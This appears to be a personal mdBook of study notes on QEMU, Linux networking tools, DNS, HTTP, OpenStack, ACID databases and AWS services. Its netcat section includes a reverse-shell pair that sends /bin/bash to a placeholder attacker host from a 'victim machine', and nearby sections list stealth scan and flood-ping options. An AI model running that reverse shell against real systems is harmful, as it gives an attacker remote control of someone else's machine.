Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Qemu

CLI

To run Qemu in terminal we can use -nographic or -display curses.

Resources

Qemu images

Qumu disk images

There two types of images: - raw: faster, static and take the whole allocated space, can be created with dd or fallocate. - qcow: less performant, dynamic copy-on-write and supports snapshoting. Does not play well with Btrfs, COW on COW.

  • Overlay storage images are a way to create images from other images.
  • Qemu images can be resized or converted to other formats with qemu-img.

GuestFS tools


qemu-img reference

Qemu networking

VirtualBox VS Qemu Networking

The following are VB Networking modes and how we can implement them in Qemu:

  • Not Attached: in qemu this is done by specifying -nic none.
  • NAT: this is the default for VB, and it is the way Qemu user networking(SLIRP) is setup.
    • The hypervisor NAT's the traffic from the guest to the outside world.
    • By default the host is accessible from the guest in the address 10.0.2.2.
    • The guest is not accessible from the host by default. Access can be achieved through Port forwarding.
    • -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222:22
    • In Qemu's usermode networking, a userspace networking stack is loaded in the qemu process. It is a standlone implementation of ip, tcp, udp, dhcp and tftp ...
  • NAT Networks: This create a network similar to a home router, the services in the network can reach each other and internet, but they can be reached by outer hosts.
    • This is done using using Bridges and TAP interfaces.
    • We create a bridge with a static IP address and we plug it into the VMs' nics, then we NAT from it. Finally we run dnsmasq on it to act as a DHCP and DNS server.
  • Bridged networking: This is the same as the previous but more flexible.
    • In Qemu the tap device is bridged to a physical network interface so the machines are accessible from the host network.
    • device virtio-net,netdev=network0 -netdev tap,id=network0,ifname=tap0,script=no,downscript=no
  • Internal networking: Same as bridged, but the VMs are not accessible from the host and vice versa.
    • This is achieved in Qemu by droping all the traffic to the bridge on the INPUT iptables chain.
    • iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
    • We either need to assign static IPs or run a DHCP server in one of the VMs.
  • Host-only networking: Hybrid between Host-Only and Bridged, since the VMs can't be accessed by the machines in the host's network, but can be accessed by the hist itself.
    • In Qemu the bridge is created and assigned an IP, and no traffic destined to it is dropped. But it is not connected to any physical interface.
  • Generic networking: VDE networks.

More on Qemu networking in the Arch wiki. And more on VB Networking on their manual.

Qemu networking CLI options

  • Qemu provide two different entities to configure networking for a vm:
    1. The frontend: The nic that the guest sees, it can either be a virtualized network card (e1000) or a paravirtualized device (virtio-net)
    2. The backend: The interface used by Qemu to exchange network packets with the outside world (other vms, the host internet ...).
  • There are 3 options to create network entities -nic, -netdev and -net.
  • -net can either create a frontend or a backend.
    • All frontends and backends created using -net are connected to a hub (previously named vlan). This way all of them will recieve each other's packets.
    • It can not use vhost acceleration.
    • Qemu -net is deprecated in favor of -device + -netdev or -nic for fast and less verbose network configurations.
  • -netdev can only create backends and needs to be coupled with -device.
    • It does not create a shared hub. and every nic is connected to its backend only, which mean packets are not accessible between interfaces.
    • We still can connect to hub using -netdev hubport, however the use of a hub is not required anymore for most usecases.
    • -device can only be used with plugable NICs. Boards with on-board NICs can't be configured with -device.
  • -nic can create both frontends and backends at the same time.
    • It is easier to use than -netdev and can configure onboard NICs, and does not place a hub between interfaces.

More information here

More on Qemu networking

  • In unpriviliged setups, qemu VMs running using the usermode networking can access each other using sockets.

More on Qemu networking and socket mode

Networking

Linux Networking

Network interface Management

1. Wired Interfaces

There are two main commands addr (Layer 3) and link (Layer 2). They have a CRUD interface, can check the help using ip <command> help. ip commands replaced ifconfig commands

  • ip l CRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
  • ip a CRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>

2. Wireless Interfaces

iw replaced iwconfig and iwlist. iw dev is used to manage the wireless interfaces, scan for available networks, link to a Network (using SSID) etc ... iw phy manages the hardware device.

iw dev wlan0 link # information about the link 
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>

3. ARP protocol

ip [-s] neigh is used to display the neighbors list aka arp cache/table (-s to have verbose statistics). ip n offers a CRuS interface to manage the ARP cache

ip n add <ip-addr> lladr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladr <mac-addr> dev <interface-name> # Replace or ADD a MAC for the IP address

Notes

  • Difference between link, device and interface Source: In Linux context they all refer to Kernel's netdev but in networking they can mean different things:
    • Link: the actual circuit, path, and/or cable between ports.
    • Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
    • Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)

TCP/IP

1. Routing

Iproute handles routing the ip route command.

ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently

2. TCP ports

Iproute replaces netstat with ss

ss -lntp 
# -l: listening sockets, -n: numerical port numbers, and hostnames -t: tcp, p: show processes using the socket

lsof is very useful too! it shows the open files per user, per process.

lsof -i4 # list all IPv4 network
lsof -p <pid> # list by pid
lsof -u <username> # list by user ^ for negation
lsof -i <protocol>:<port> # list by port
lsof <file-path> # process opening a file

3. TCPDump

TCP dump performs packet monitoring and capture on any Network interface (even Bleutooth, loopback ....)

tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file

TCPDump Cheatsheet

OptionDescription
-DList interfaces available for capture
-i eth0Capture packets on an interface or all interfaces (any)
-cCapture a specified count of packets
-nDisable hostname resolution
-nnDisable protocol, port, and hostname resolution
-i any protocolCapture packets by protocol on all interfaces
-i any host 10.0.2.18Capture packets by a host on all interfaces
-i any src/dst 10.0.2.10Capture packets by source or destination address on all interfaces
-AView packet content in ASCII
-XView packet content in hex and ASCII
-w file_name.pcapSave the output of tcpdump to a file
-r file_name.pcapRead packets from a file

4. Port Scanning with Nmap

Nmap is a port scanner. It supports many scanning modes.

nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU/-sP <hostname> # scan UDP or TCP (default) ports only
nmap -sS <hostname> # TCP Syn scan (stealthy), quick and un-intrusive. start TCP handshake and never end it.
nmap -sT <hostname> # TCP connect Scan.

5. Interacting with remote hosts

ping send an ICMP packet to a destination IP. Very useful for troubleshooting and discovery.

Ping Cheatsheet

OptionDescription
hostnameSend a stream of ICMP packets to a hostname
10.0.2.10Send a stream of ICMP packets to an IP address
-c 5 10.0.2.10Send a specified amount of packets
-s 100 10.0.2.10Alter the size of the packets
-i 3 10.0.2.10Change the interval for sending packets
-q 10.0.2.10Only show the summary information
-w 5 10.0.2.10Set a timeout of when to stop sending packets
-f 10.0.2.10Flood ping. Send packets as soon as possible.
-p ff 10.0.2.10Fill a packet with data. ff fills the packet with ones
-b 10.0.2.10Send packets to a broadcast address
-t 10 10.0.2.10Limit the number of network hops
-v 10.0.2.10Increase verbosity

6. Netcat

Netcat is also very useful in this regard, since it writes and reads data across networks.

nc -l <port> # Listen on specific port
nc -u -l <port> # listen on an UDP port
nc -v -z <ip-address> <port> # Report connection status

# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine

# File Transfer
nc -lvp 4444 > text.txt
nc <hostname> 4444 < test.txt

# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>

Network Configurations

1. RHEL Based systems (Old)

The config files used to live in /etc/sysconfig/network-scripts

OptionDescription
TYPE=EthernetThe type of network interface device (e.g., Ethernet, Wi-Fi)
BOOTPROTO=noneSpecify boot protocol (none, dhcp, bootp)
DEFROUTE=yesSpecify default route for IPv4 traffic (yes, no)
IPV4_DEFROUTE=yesSpecify default route for IPv6 traffic (yes, no)
IPV4_FAILURE_FATAL=noDisable the device if the configuration fails (yes, no)
IPV6_FAILURE_FATAL=noDisable the device if the configuration fails (yes, no)
IPV6INIT=yesEnable or disable IPv6 on the interface (yes, no)
IPV6_AUTOCONF=yesEnable or disable autoconf configuration (yes, no)
NAME=eth0Specify a name for the connection
UUID=...Specify the unique identifier for the device
ONBOOT=yesActivate interface on boot (yes, no)
HWADDR=00:00:00:00:00:00Specify the MAC address for the interface
IPADDR=10.0.1.10Specify the IPv4 address.
PREFIX=24Specify the network prefix.
NETMASK=255.255.255Specify the netmask.
GATEWAY=10.0.1.1Specify the gateway.
DNS1=192.168.123.3Specify a DNS server.
DNS2=192.168.123.2Specify another DNS server.
PEERDNS=yesModify the /etc/resolv.conf file (yes/no).

2. Debian Based Systems (Old)

All the network interfaces configurations go into /etc/network/interfaces, with an /etc/network/interfaces.d. Interfaces with lines beginning with auto are brought up on system startup.

3. Distro agnostic config files

In addition to the distro related network configuration files, here are the most common remaining ones:

  • /etc/hosts: Name to IP Address associations
  • /etc/resolv.conf: DNS resolver configuration
  • `/etc/sysconfig/network: Global network settings
  • /etc/nsswitch.conf: The Name Service Switch config file, used to determine Sources from which to obtain name-service information, and their order.
  • /etc/hostname: holds the machine hostname (can be set/shown using hostname or hostnamectl)
  • /etc/hosts.deny and /etc/hosts.allow: Allow or block access to certain services from remote clients (Can use ALL to block or allow all). For example to only allow hosts from 10.0.3.* network to connect to our host via SSH we can do the following
# /etc/hosts.deny
sshd : ALL

# /etc/hosts.allow
sshd : 10.0.3.*

4. Network Manager

  • Network Manager vs ifcfg-* Options
nmcli con modifcfg-* filePurpose
ipv4.method manualBOOTPROTO=noneSet a static IPv4 address
ipv4.method autoBOOTPROTO-dhcpAutomatically set IPv4 address using DHCP
ip4ipv4.address "192.168.0.10/24"IPADDR=192.168.0.10 PREFIX=24
gw4ipv4.gateway 192.168.0.1GATEWAY=192.168.0.1
ipv4.dns 8.8.8.8DNS1-8.8.8.8Specify DNS server
autoconnect yesONBOOT=yesAutomatically activate this connection on boot
con-name eth0NAME=eth0Specify the name of the connection
ifname eth0DEVICE-eth0Specify the interface for the connection
802-3-ethernet.mac-address ADDRHWADDR=...Specify the MAC address of the interface for the connection
  • nmcli commands
PurposeCommand
nmcli dev statusShow the status of all network interfaces
nmcli con showList all connections
nmcli con show nameList the current settings for the connection name
nmcli con add con-name name ...Add a new connection named name
nmcli con mod name ...Modify a connection
nmcli con reloadReload the network configuration files
nmcli con up name 1 nmcli con down nameActivate or deactivate a connection
nmcli dev dis devDeactivate and disconnect the current connection
nmcli con del nameDelete the connection and its configuration file

Network Diagnostics and Troubleshooting

1. Traffic analysis with Traceroute and MTR

Traceroute tracks the route taken by packets from source to destination. The traceroutecommand uses UDP packet by default, but can use ICMP ECHO -I or TCP SYN -T for probing. Tracepath is modern alternative with less fancy options.

traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.

MTR on the other hand use ICMP ECHO by default, but this can be changed using -T (TCP) and -u (UDP). ALso MTR is a TUI and record more statistics.

mtr -r -c 3 -f 4 www.google.com # Generate a report instead of RT interface (3 runs, start as 6th hop).
mtr -run4 -c 3 www.google.com # Only non resolved IPv4 addresses, use UDP for probes.
mtr -w -c 3 www.google.com # Generate a wise report instead (non truncated IP addresses/hostnames)

2. Network logs

Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.

Another source for logs is Systemd logs, which are stored in a binary format and can be consulted using the journalctl utility. In Addition to all of that we have dmesg which read messages from the Kernel ring buffer.

Notes

  • Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
  • Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
  • The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.

Resources

DNS

DNS Resolution process

  1. DNS resolver look in its DNS cache
  2. DNS resolver breaks iduoad.com to [., com., iduoad.com.]
  3. The DNS resolution start at . which is called root domain. Its ip addresses are already know to the DNS resolver. => returns(address of the authoritative nameserver of .)
  4. DNS resolver queries the root domain nameserver to find the DNS servers to respond with details on com.. => returns(address of the authoritative nameserver of com.)
  5. DNS resolver queries the com. authoritative nameserver to get authoritative nameserver for iduoad.com.
  6. DNS resolver queries the authoritative nameserver for iduoad.com and gets the latter's IP address.

A DNS request using dig utility:

# To visualize the entire process we run the following command
dig +trace iduoad.com

A DNS response looks like the following:

iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
# REQUEST    TTL(for cache)    IN    Query TYPE    Response

DNS and Layer 4 protocols

Multiplexing/Demultiplexing and UDP in linux

  • Multiplexing: When a client makes a DNS request, after filling the necessary application payload, it passes the payload to the kernel via sendto system call.
  • Demultiplexing: When the kernel on server side receives the packet, it checks the port number and queues the packet to the application buffer of the DNS server process which makes a recvfrom system call and reads the packet.
  • UDP is one of the simplest transport layer protocol and it does only multiplexing and demultiplexing. Another common transport layer protocol TCP does a bunch of other things like reliable communication, flow control and congestion control...

TCP/UDP throughput and Kernel buffer size

  • If the underlying network is slow, and the UDP layer can't queue packets down to the Network Layer. sendto syscall will hang until the kernel finds some of its buffer freed up. Increasing write memory buffer values using sysctl variables net.core.wmem_max and net.core.wmem_default provides some cushion to the application from the slow network.
  • Same thing happens in the server side. If the receiver process is slow (slower than the Kernel), the kernel has to drop packets which can't queue due to the buffer being full. Since UDP doesn’t guarantee reliability these dropped packets can cause data loss unless tracked by the application layer. Increasing sysctl variables rmem_default and rmem_max can provide some cushion to slow applications from fast senders.

DNS Resolution in Linux

  1. When we head into a website. The browser first looks if the domain is already stored in its DNS cache.
  2. If the domain name does not exist in the browser's DNS cache, the browser calls the gethostbyname syscall.
  3. Linux looks in /etc/nsswitch.conf to know the order it will follow when trying to resolve the domain name to the ip address.
  4. Let's say the NSS file contains the following entry hosts: files dns.
  5. The OS will look in /etc/hosts file first for match of the domain name.
  6. If none is found in the hosts file, it will use nss-dns plugin to make a DNS request to the DNS resolvers listed in /etc/resolv.conf (in order from top to bottom).

The DNS resolvers are populated by DHCP or statically configured by an administrator.

nsswitch.conf file

The /etc/nsswitch.conf file is used to configure which services are to be used to determine information such as hostnames, password files, and group files.

An example of the /etc/nsswitch.conf

# Name Service Switch configuration file.
# See nsswitch.conf(5) for details.

passwd: files systemd
group: files [SUCCESS=merge] systemd
shadow: files systemd
gshadow: files systemd

publickey: files

hosts: mymachines resolve [!UNAVAIL=return] files myhostname dns
networks: files

protocols: files
services: files
ethers: files
rpc: files

netgroup: files

The syntax is the following:

database_name: (service_specifications...[STATUS=ACTION])
  • database_name: is the database name we will be looking for.
  • service_specification: where we'll be looking. Depend on the presence of shared libraries. (e.g files, db, ldap, winbind ...)
  • STATUS: a resulting status for service_specification if it occurs ACTION is taken.

In the previous example:

  • for passwd, group, shadow and gshadow the system will look in the files first then it will fallback to systemd.
  • for group if the lookup in the files succeeds, the processing will continue to systemd and will merge the member list of the already found groups will be merged together.
  • for hosts it will use mymachines plugin, then resolve. If resolve is available it will return (stop the lookup) otherwise it will continue to files, myhostname and finally dns.
  • for other services it will use files.

NSS Plugins

There are many NSS (Name Service Switch) plugins that are used to resolve names to ips. Here are some examples:

  • nss-mymachines: provides hostname resolution for the names of containers running locally that are registered with systemd-machined.service.
  • nss-myhostname: provides hostname resolution for the locally configured system hostname as returned by gethostname.
  • nss-resolve: resolves hostnames via the systemd-resolved local network name resolution service. It replaces the nss-dns plug-in module that traditionally resolves hostnames via DNS.
  iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
  # REQUEST    TTL(for cache)    IN    Query TYPE    Response

Linux DNS utilities: dig vs nslookup

  • dig uses the OS resolver libraries. nslookup uses is own internal ones.
  • Internet Systems Consortium (ISC) has been trying to get people to stop using nslookup.
  • nslookup was considered deprecated until BIND 9.9.0a3 release.
  • Source in StackOverflow thread #❔

DNS applications

HTTP

HTTP/1.0 vs HTTP/1.1 vs HTTP/2.0

  • HTTP/1.0 uses a new TCP connection for each request.
  • HTTP/1.1 can only have one inflight request in an open TCP connection but connections can be reused for multiple requests one after another.
  • HTTP/2.0 can have multiple inflight requests on the same TCP connection.
  # This will exit after this single request.
  telnet iduoad.com 80
  GET / HTTP/1.0
  HOST:iduoad.com
  USER-AGENT: curl

  # We can reuse the same connection for multiple requests.
  telnet iduoad.com 80
  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

Cloud

Openstack

Installation

Kolla Ansible

Kolla ansible inventory consists of 5 groups:

  1. control
  2. compute
  3. network
  4. storage
  5. monitoring

source

Networking

Openstack requires at least 2 network interfaces, in Kolla they are created using:

  • network_interface: Not used on its own but most other services default to using it.

  • neutron_external_interface: Required by Neutron and used for flat networking and tagged vlans

  • Openstack networks are Layer 2.

A network is the central object of the Neutron v2.0 API data model and describes an isolated Layer 2 segment. In a traditional infrastructure, machines are connected to switch ports that are often grouped together into Virtual Local Area Networks (VLANs) identified by unique IDs. Machines in the same network or VLAN can communicate with one another but cannot communicate with other networks in other VLANs without the use of a router.

IP address in openstack

  • To create public ip address in openstack (floating ips) we use openstack floating ip create docs
  • To assign a new ip address to a machine we use openstack server add floating ip docs

Create a Test VM

openstack server create --flavor 1 --image cirros  --network <network-id>  test_vm

Networking

Creation

The Neutron workflow (when booting a VM instance)

  1. The user creates a network.
  2. The user creates a subnet and associates it with the network.
  3. The user boots a virtual machine instance and specifies the network.
  4. Nova interfaces with Neutron to create a port on the network.
  5. Neutron assigns a MAC address and IP address to the newly created port using attributes defined by the subnet.
  6. Nova builds the instance's libvirt XML file, which contains local network bridge and MAC address information, and starts the instance.
  7. The instance sends a DHCP request during boot, at which point, the DHCP server responds with the IP address corresponding to the MAC address of the instance

Deletion

  1. The user destroys the virtual machine instance.
  2. Nova interfaces with Neutron to destroy the ports associated with the instances.
  3. Nova deletes local instance data.
  4. The allocated IP and MAC addresses are returned to the pool.

Console

There are three remote console access methods commonly used with OpenStack:

  • novnc: An in-browser VNC client implemented using HTML5 Canvas and WebSockets
  • spice: A complete in-browser client solution for interaction with virtualized instances
  • xvpvnc: A Java client offering console access to an instance

Resources

Databases

ACID

Atomicity

Definition

A transaction is treated as a single "atom." Either every statement in the transaction succeeds, or the entire thing is rolled back, leaving the database unchanged.

Implementation

  • Mysql: Uses the Undo Log to revert changes if a transaction fails. If you use the InnoDB engine (the default), you get this protection.
  • Postgres: Uses a combination of WAL and a system called MVCC (Multiversion Concurrency Control). It essentially tracks the state of data "versions" to ensure it can discard uncommitted changes instantly.

Consistency

definition

Consistency ensures that a transaction takes the database from one valid state to another, maintaining all predefined rules (constraints, cascades, triggers).

Implementation

There are two levels of consistency:

  1. Data consistency
    • You have multiple views of your data (e.g foreign keys), will change in 1 view propagate to the other views.
    • This is achieved by
      • The user (database designer)
      • Referential integrity (foreign keys, cascade ...)
      • Atomicity and Isolation.
  2. Read consistency
    • If TX1 updates a field, TX2 should read the new value.
    • SQL databases can guarantee read consistency in case of 1 Server
    • Horizontal scaling or Caching lead to read inconsistency => Eventual consistency.

Isolation

definition

This ensures that concurrent transactions (multiple people using the database at once) don't interfere with each other. It makes it appear as if transactions are running sequentially.

There are four main isolation levels you should know:

  • Read Uncommitted: Can see "dirty" (uncommitted) data. -> Dirty reads
  • Read Committed: (Postgres Default) You only see data once it's saved. -> Non-Repeatable Reads
  • Repeatable Read: (MySQL Default) If you read a row twice in one transaction, the data won't change even if someone else updated it. -> Phantom reads
  • Serializable: The strictest level; transactions behave as if they are the only ones running. -> Solves isolation but is very expensive.

There is a 5th non standard level called Snapshot: Like Repeatable Reads but it takes only TX committed before the current TX start.

Implementation

Both Postgres and MySQL use MVCC and Locking to implement isolation. The difference is that Postgres stores old versions of the rows in the tables and MySQL stores the old versions of the rows in the UNDO logs and includes a hidden DB_ROLL_PTR in each row that links it to its previous version in the undo log, creating a version chain.

MySQL calls Snapshots Read Views. New Read Views are created at each SELECT statement in READ COMMITTED mode and on the first SELECT on REPEATABLE READ.

MySQL then prevents Phantoms in REPEATABLE READ using Gap Locks and Next-Key Locks.

  • Record Lock: Locks the actual index record.
  • Gap Lock: Locks the "gap" between index records.
  • Next-Key Lock: A combination of a record lock and a gap lock on the space before that record.

Database

Open Source (OSS) / Closed

Default Level

PostgreSQL

OSS Read Committed

MySQL (InnoDB)

OSS Repeatable Read

MariaDB

OSS Repeatable Read

Oracle DB

Closed Read Committed

SQL Server

Closed Read Committed

SQLite

OSS Serializable (due to simple locking)

Durability

definition

Once a transaction is committed, it remains committed—even in the event of a system crash or power failure.

Implementation

Both databases use a Write-Ahead Log (WAL).

  • MySQL: Calls this the Redo Log.
  • Postgres: Calls this the WAL.

The database writes the intent of the change to a log file on the disk before updating the actual data files. If the system crashes, it simply replays the log to recover the data.

Postgres - ACID

Atomicity

AWS

AWS S3

General Overview

  • Object storage service for scalable, durable data storage.
  • 99.999999999% (11 9's) durability; 99.99% availability for most classes.
  • Unlimited storage; pay for usage (storage, requests, data transfer).
  • Global via multi-Region access; integrates with AWS services (EC2, Lambda, etc.).
  • Data Model:
    • Bucket – top-level container (unique name, global namespace)
    • Object – file + metadata
    • Key – full path to object within a bucket
  • There is no concept of directory in General-purpose S3.
  • Objects size is limited at 5GB objects with more than 5GB, must use "multi-part" upload.
  • Objects can have key-value pairs of Metadata and can have key-value tags (useful for security/lifecycles)

Storage Classes

ClassUse CaseDurabilityAvailabilityRetrieval TimeMinimum Storage DurationRetrieval Fee
S3 StandardFrequent access11 9s99.99%InstantNoneNo
S3 Intelligent-TieringUnknown access patterns11 9s99.9–99.99%InstantNoneNo
S3 Standard-IAInfrequent access11 9s99.9%Instant30 daysYes *
S3 One Zone-IANon-critical infrequent data11 9s99.5%Instant30 daysYes
S3 Glacier Instant RetrievalRarely accessed, quick retrieval11 9s99.9%ms90 daysYes
S3 Glacier Flexible RetrievalArchive w/ minutes–hours access11 9s99.99%minutes–hours90 daysYes
S3 Glacier Deep ArchiveLong-term cold storage11 9s99.99%hours (12h typical)180 daysYes

* : Retrieval is priced per GB.

Glacier Retrieval Options

TierFlexible RetrievalDeep Archive
Expedited1-5 minutesN/A
Standard3-5 hours12 hours
Bulk5-12 hours48 hours

Versioning

Lifecycle rule actions

Transition rule actions

  • (R1) Transition current versions of objects between storage classes.
    • Storage class transitions (Target storage class).
    • Days after object creation.
  • (R2) Transition noncurrent versions of objects between storage classes.
    • Storage class transitions.
    • Days after objects become noncurrent.
    • Number of newer versions to retain.

Deletion/Expiration rule actions

  • (R3) Expire current versions of objects.
    • Days after object creation
  • (R4) Permanently delete noncurrent versions of objects.
    • Days after objects become noncurrent
    • Number of newer versions to retain - Optional
  • (R5) Delete expired object delete markers or incomplete multipart uploads.
    • Delete expired object delete markers
    • Delete incomplete multipart uploads

Object deletion in a versioned bucket.

  • Delete an object with Show versions off -> Soft Delete -> Delete Marker created and is the current version shadowing all other versions.
  • Delete an object with Show versions on -> Permanent Delete for the chosen version -> if current is deleted the latest non current becomes current.
  • No promotion is supported. If an old version is wanted it should be copied over the latest version to create a new one with the content of the old one.
  • Lifecycle rule actions (R3) creates a delete marker and promotes it as current version.
  • The Expiration rule (R3) only applies to actual object versions, not delete markers.

Replication

Cross-Region Replication (CRR) vs Same-Region Replication (SRR)

FeatureDetails
PrerequisitesVersioning enabled on both source and destination
Replication scopeAll objects, prefix, or tags
What's replicatedNew objects after enabling, metadata, ACLs, tags
Not replicatedExisting objects (need S3 Batch), lifecycle actions, objects in Glacier/Deep Archive
Delete behaviorDelete markers can be replicated (optional), version deletes not replicated
Replication Time Control (RTC)99.99% within 15 minutes (SLA)
Batch ReplicationReplicate existing objects, failed replications

Two-way replication

  • Enable bidirectional replication between buckets
  • Prevents replication loops automatically

Security

Encryption at Rest

TypeKey ManagementPerformance
SSE-S3AWS managed (AES-256)No impact
SSE-KMSAWS KMS keysKMS API limits apply
SSE-CCustomer-provided keysCustomer manages keys
Client-sideEncrypt before uploadCustomer responsibility
  • Bucket default encryption: Applied to new objects without specified encryption
  • Enforce encryption: Use bucket policy to deny unencrypted uploads

Encryption in Transit

  • SSL/TLS (HTTPS) endpoints available
  • Enforce with bucket policy: aws:SecureTransport condition

Access Control

Priority order: Explicit DENY → Explicit ALLOW → Implicit DENY

MethodScopeUse Case
IAM PoliciesUser/role levelControl who can access S3
Bucket PoliciesBucket levelCross-account, public access, IP restrictions
ACLs (legacy)Bucket/object levelSimple permissions (avoid for new implementations)
Access PointsSubset of bucketSimplify permissions for shared datasets
Presigned URLsObject levelTemporary access without credentials

Block Public Access (BPA)

  • Four settings: Block public ACLs, Ignore public ACLs, Block public policies, Restrict public buckets
  • Applied at account or bucket level
  • Overrides bucket policies and ACLs

S3 Access Points

  • Named network endpoints with dedicated policies
  • Each access point has own DNS name
  • Supports VPC-only access
  • Simplifies managing access for shared datasets
  • Can restrict to specific VPC/VPCE

Event Notifications

Destinations: SNS, SQS, Lambda, EventBridge

Events:

  • Object created (PUT, POST, COPY, CompleteMultipartUpload)
  • Object deleted, restored
  • Replication events
  • Lifecycle events
  • Intelligent-Tiering changes

EventBridge advantages:

  • Advanced filtering (JSON rules)
  • Multiple destinations
  • Archive, replay events
  • 18+ AWS service targets

S3 Directory Buckets

  • New bucket type optimized for high performance
  • Used with S3 Express One Zone storage class
  • Single-digit millisecond latency
  • Up to 100GB/s throughput per bucket
  • Consistent hashing for predictable performance
  • Different naming: bucket-name--azid--x-s3

Performance

Multipart Upload

  • Required for objects > 5GB
  • Recommended for objects > 100MB
  • Parts: 1-10,000 parts, 5MB-5GB each (except last)
  • Benefits: Parallel uploads, pause/resume, start before knowing final size

Transfer Acceleration

  • Uses CloudFront edge locations
  • URL: bucket-name.s3-accelerate.amazonaws.com
  • Up to 50-500% faster for global users
  • Additional cost per GB
  • Test speed: AWS provides comparison tool

Performance Baseline

  • 3,500 PUT/COPY/POST/DELETE requests per second per prefix
  • 5,500 GET/HEAD requests per second per prefix
  • No limit on prefixes per bucket
  • Spread objects across prefixes for higher throughput

Byte-Range Fetches

  • Request specific byte ranges of object
  • Parallelize downloads
  • Resilient to network failures (retry smaller range)

S3 Select & Glacier Select

  • Retrieve subset of data using SQL
  • Filter at S3 side (up to 400% faster, 80% cheaper)
  • Works with CSV, JSON, Parquet
  • Supports compression (GZIP, BZIP2)

AWS EC2

EC2 instance types

Instance types names are composed of 4 components

  1. Instance family: The primary purpose of the instance.
  2. Generation: Version number, higher is newer, faster and usually cheaper for the same performance
  3. Additional capabilities: Information about Additional hardware capabilities. Like CPU brand, networking optimization, ...
  4. Service related prefix/suffix: The service owning the instance (e.g. rds, search, cache...)

Common Instance families

FamilyLetterWhat It's Optimized ForCommon Use Cases
General PurposeT (Burstable)Low baseline CPU with "burst" capability.Dev/test servers, blogs, small web apps.
General PurposeM (Main / Balanced)A balanced mix of CPU, Memory, and Network.Most applications, web servers, microservices.
Compute OptimizedC (Compute)High CPU power relative to memory (RAM).Batch processing, media transcoding, game servers.
Memory OptimizedR (RAM)A large amount of Memory relative to CPU.Databases (RDS), in-memory caches (ElastiCache).
Storage OptimizedI / D (I/O, Dense)Extremely high-speed local disk I/O.NoSQL databases, search engines (Elasticsearch).
Accelerated ComputingG / P (Graphics / Parallel)Hardware accelerators (GPUs).AI/Machine Learning, 3D rendering.

Common Additional capabilities

Capability LetterMeaning (Processor or Feature)
gGraviton (AWS's custom ARM processors)
aAMD processors
iIntel processors (often omitted if default)
dLocal NVMe Storage (fast "instance store" drives)
nNetwork Optimized (higher network bandwidth)
zHigh Frequency (very fast single-core CPU)

CloudFront

ACM certificates and CloudFront

To associate a custom SSL/TLS certificate with an Amazon CloudFront distribution, the certificate must be provisioned or imported in the US East (N. Virginia) us-east-1 region using AWS Certificate Manager (ACM). This requirement applies regardless of where your origins or users are located, as CloudFront’s global control plane operates out of N. Virginia. Certificates created in other regions (e.g., eu-west-1, us-west-2) will not be visible or selectable in the CloudFront console.

AWS SSO CLI Helpers

Content of the .aws files

  • config: Contain the config for all the profiles and sso-session. It only contains non-sensitive data.
  • credentials: Contains credentials for AWS accounts. Keys in case of key auth, and SSO session tokens in case of SSO authentication
  • cache: Stores temporary credentials (e.g. sso session tokens). Used to avoid re-authentication each time we use CLI
  • cli: contains cache and history for CLI.

Profile sections use [profile profile_name] (e.g., [profile user1]; note the "profile" prefix, which distinguishes it from the credentials file).

credential_process = /opt/home/theodo/.local/bin/go-aws-sso assume -q -a 381491832352 -n Admin. This can be used in credentials file to use a command to get the credentials.

All these are overridden by these env variables:

AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN
AWS_DEFAULT_REGION
AWS_PROFILE
AWS_CONFIG_FILE
AWS_SHARED_CREDENTIALS_FILE

What happens when I run aws configure sso

  • config: contains [profile profile-name] and [sso-session session-name]
  • sso/cache: contains files with cached tokens.
  • I need to learn about SSO in general to understand the different fields
  • credentials is never changes since SSO uses refresheable tokens.

AWS SSO Helpers

go-aws-sso:

How it works

This has 3 sub-commands:

  • generate: creates a config file in XDG_CONFIG.
  • assume: takes an account_id and role_name and assume it.
  • refresh: Refreshes the credentials. Nothing happens if the credentials are still not expired

If the command is invoked without subcommands it fetches an interactive menu with all the accounts and roles to choose from.

There are 2 sets of files created:

  • config file: generate with config and contains the SSO instance url and the region.
